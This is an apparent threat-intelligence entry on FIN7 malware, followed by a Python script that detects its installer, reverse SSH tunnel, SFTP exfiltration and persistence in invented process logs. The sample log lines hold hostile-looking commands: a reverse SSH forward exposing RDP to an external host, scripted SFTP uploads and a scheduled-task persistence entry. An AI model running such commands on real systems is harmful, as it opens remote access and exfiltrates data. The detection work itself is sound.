Suspected Squeamish Libra (FIN7) malware

Intel Name: Suspected Squeamish Libra (FIN7) malware

Date of Scan: November 19, 2025

Impact: High

Summary:
FIN7 has been active since at least 2013, previously targeting sectors such as retail, hospitality, and financial services. Over time the group shifted its monetization strategy from POS malware to big-game-hunting ransomware. Although widely analyzed, the malware’s code has changed very little since its early versions, and it appears to have been used in real-world attacks since at least 2022. The payload is typically retrieved from a remote server hosting a ZIP archive that contains an “install.bat” script. Open-source reporting indicates the malware provides persistence, reverse SSH tunneling for C2, and data exfiltration via SFTP.
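The behaviours named in the summary (a batch installer staged from a ZIP, a reverse SSH tunnel for C2, scripted SFTP transfers, and persistence pointing back at the staging directory) are all visible in process-creation telemetry. The following is an added example written for this page, not code from the report or from any vendor product: it parses a constructed, simplified process-event log format and applies one heuristic rule per behaviour. The log schema, field names, hostnames, paths, ports and the `203.0.113.10` address are all invented for the example; the rule thresholds are illustrative, not tuned signatures.

```python
"""Heuristic detections for the behaviours summarised above, run over
constructed process-creation events. The line format and field names are
assumptions made for this example, not a real product's schema."""
import re
from dataclasses import dataclass
from typing import List, Optional

# Assumed event format: "<ts> host=<h> parent=<p> image=<i> cmdline="<c>""
LINE_RE = re.compile(
    r'^(?P<ts>\S+)\s+host=(?P<host>\S+)\s+parent=(?P<parent>\S+)\s+'
    r'image=(?P<image>\S+)\s+cmdline="(?P<cmdline>.*)"$'
)


@dataclass
class Event:
    ts: str
    host: str
    parent: str
    image: str
    cmdline: str


@dataclass
class Finding:
    rule: str
    ts: str
    host: str
    cmdline: str


def parse_event(line: str) -> Optional[Event]:
    m = LINE_RE.match(line.strip())
    if not m:
        return None  # malformed lines are skipped rather than aborting the scan
    return Event(**m.groupdict())


# Rule 1: install.bat launched from a user-writable staging directory
# (the ZIP-delivered batch installer described in the summary).
STAGING_INSTALL_RE = re.compile(r'(?i)\\(?:temp|downloads|appdata)\\.*\binstall\.bat\b')

# Rule 2: OpenSSH client started with a remote (reverse) port forward, the
# primitive behind a reverse SSH tunnel. Accepts "-R 2222:..." and "-R2222:...".
REVERSE_FORWARD_RE = re.compile(r'(?:^|\s)-R\s*\d+:')

# Rule 3: sftp client driven non-interactively (batch file or BatchMode),
# consistent with automated transfer rather than an admin typing commands.
SFTP_BATCH_RE = re.compile(r'(?i)(?:^|\s)-b\s+\S+|-oBatchMode=yes|BatchMode=yes')

# Rule 4: persistence via scheduled task or Run key that references the
# same staging directory as the installer.
PERSIST_RE = re.compile(r'(?i)(schtasks(\.exe)?\s+/create|reg(\.exe)?\s+add\s+\S*\\Run\b)')


def evaluate(ev: Event) -> List[Finding]:
    hits: List[Finding] = []
    img = ev.image.lower()
    cl = ev.cmdline
    if img in ("cmd.exe", "wscript.exe", "powershell.exe") and STAGING_INSTALL_RE.search(cl):
        hits.append(Finding("staged_install_bat", ev.ts, ev.host, cl))
    if img == "ssh.exe" and REVERSE_FORWARD_RE.search(cl):
        hits.append(Finding("reverse_ssh_forward", ev.ts, ev.host, cl))
    if img == "sftp.exe" and SFTP_BATCH_RE.search(cl):
        hits.append(Finding("scripted_sftp", ev.ts, ev.host, cl))
    if PERSIST_RE.search(cl) and STAGING_INSTALL_RE.search(cl):
        hits.append(Finding("persistence_to_staging", ev.ts, ev.host, cl))
    return hits


def scan(lines) -> List[Finding]:
    findings: List[Finding] = []
    for line in lines:
        ev = parse_event(line)
        if ev:
            findings.extend(evaluate(ev))
    return findings


# Constructed sample events (not real telemetry); hosts, paths and the
# 203.0.113.10 address are invented for this example.
SAMPLE_LOG = [
    '2025-11-19T09:58:01Z host=WS01 parent=explorer.exe image=cmd.exe cmdline="cmd.exe /c C:\\Users\\alice\\AppData\\Local\\Temp\\pkg\\install.bat"',
    '2025-11-19T09:58:03Z host=WS01 parent=cmd.exe image=schtasks.exe cmdline="schtasks /create /tn Updater /tr C:\\Users\\alice\\AppData\\Local\\Temp\\pkg\\install.bat /sc onlogon"',
    '2025-11-19T09:58:05Z host=WS01 parent=cmd.exe image=ssh.exe cmdline="ssh.exe -N -R 2222:127.0.0.1:3389 -i C:\\Users\\alice\\AppData\\Local\\Temp\\pkg\\id tunnel@203.0.113.10"',
    '2025-11-19T09:59:10Z host=WS01 parent=cmd.exe image=sftp.exe cmdline="sftp.exe -b C:\\Users\\alice\\AppData\\Local\\Temp\\pkg\\put.txt -i C:\\Users\\alice\\AppData\\Local\\Temp\\pkg\\id tunnel@203.0.113.10"',
    # Benign control: an administrator's session using a local forward only.
    '2025-11-19T10:05:00Z host=ADM02 parent=powershell.exe image=ssh.exe cmdline="ssh.exe -L 8080:intranet:80 admin@jump.example.internal"',
    'this line is malformed and is skipped',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f.ts} {f.host} {f.rule}: {f.cmdline}")
```

Each rule fires independently, so a host that trips all four within a short window is a far stronger signal than any single hit; the local-forward (`-L`) control line shows why the reverse-forward rule keys on `-R` specifically rather than on any ssh.exe execution.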
